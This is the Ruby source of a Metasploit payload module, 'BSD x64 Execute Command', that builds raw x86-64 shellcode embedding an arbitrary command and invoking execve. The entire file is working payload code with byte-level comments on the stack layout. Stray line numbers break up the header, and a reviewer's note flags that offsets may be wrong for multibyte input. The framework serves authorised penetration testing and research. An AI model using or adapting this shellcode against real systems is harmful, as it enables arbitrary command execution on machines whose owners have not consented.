##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
###
7
#
8
# Exec
9
# ----
10
#
11
# Executes an arbitrary command.
12
#
13
###
14
module MetasploitModule
  # Payload size recorded for the framework (not recomputed by this module).
  CachedSize = 31

  include Msf::Payload::Single
  include Msf::Payload::Bsd

  # Describe the payload to the framework and declare the CMD option.
  #
  # @param info [Hash] module metadata supplied by the loader; merged with
  #   the values declared below.
  def initialize(info = {})
    metadata = merge_info(
      info,
      'Name' => 'BSD x64 Execute Command',
      'Description' => 'Execute an arbitrary command',
      'Author' => 'joev',
      'License' => MSF_LICENSE,
      'Platform' => 'bsd',
      'Arch' => ARCH_X64
    )
    super(metadata)

    # CMD is required: it is the command line split into argv below.
    cmd_option = OptString.new('CMD', [ true, 'The command string to execute' ])
    register_options([cmd_option])
  end

  # Build the payload bytes for the command held in the CMD option.
  #
  # Layout: the NUL-terminated argv strings are embedded directly after a
  # CALL, so the return address popped into rdi points at argv[0]; the
  # remaining argument pointers are then pushed so that rsp can serve as
  # argv for the execve syscall at the end.
  #
  # @param _opts [Hash] unused; accepted for interface compatibility
  # @return [String] the raw payload bytes
  def generate(_opts = {})
    tokens = Shellwords.shellsplit(datastore['CMD'] || '')
    # argv[0] stays first; the remaining arguments are reversed so that
    # pushing their pointers in table order leaves them in the original
    # order on the downward-growing stack.
    rest = tokens[1..] || []
    argv = ([tokens.first] + rest.reverse).compact

    # Inline string table, one NUL-terminated entry per argument.
    strings = argv.map { |arg| "#{arg}\x00" }.join

    # NOTE(review): String#length counts characters, not bytes; if CMD can
    # carry multibyte text the offsets below may not match the byte layout
    # of the string table — confirm what encoding the datastore delivers.
    pieces = []
    pieces << "\x48\x31\xd2"                               # xor rdx, rdx
    pieces << ("\xe8" + [strings.length].pack('V'))        # call past the string table
    pieces << strings                                      # CMD string table
    pieces << "\x5f"                                       # pop rdi (argv[0])
    if argv.length > 1
      pieces << "\x48\x89\xf9"                             # mov rcx, rdi
      pieces << "\x52"                                     # push rdx (null)
      # Walk the string table: advance rcx by the previous entry's length
      # (plus its NUL) and push the resulting pointer.
      argv[1..].each_index do |idx|
        pieces << ("\x48\x81\xc1" + [argv[idx].length + 1].pack('V')) # add rcx, ...
        pieces << "\x51"                                   # push rcx (build str array)
      end
    else
      pieces << "\x52"                                     # push rdx (null)
    end
    pieces << "\x57"                                       # push rdi
    pieces << "\x48\x89\xe6"                               # mov rsi, rsp
    pieces << "\x48\x31\xc0"                               # xor rax, rax
    pieces << "\x48\x83\xc8\x3b"                           # or rax, 0x3b (execve)
    pieces << "\x0f\x05"                                   # syscall
    pieces.join
  end
end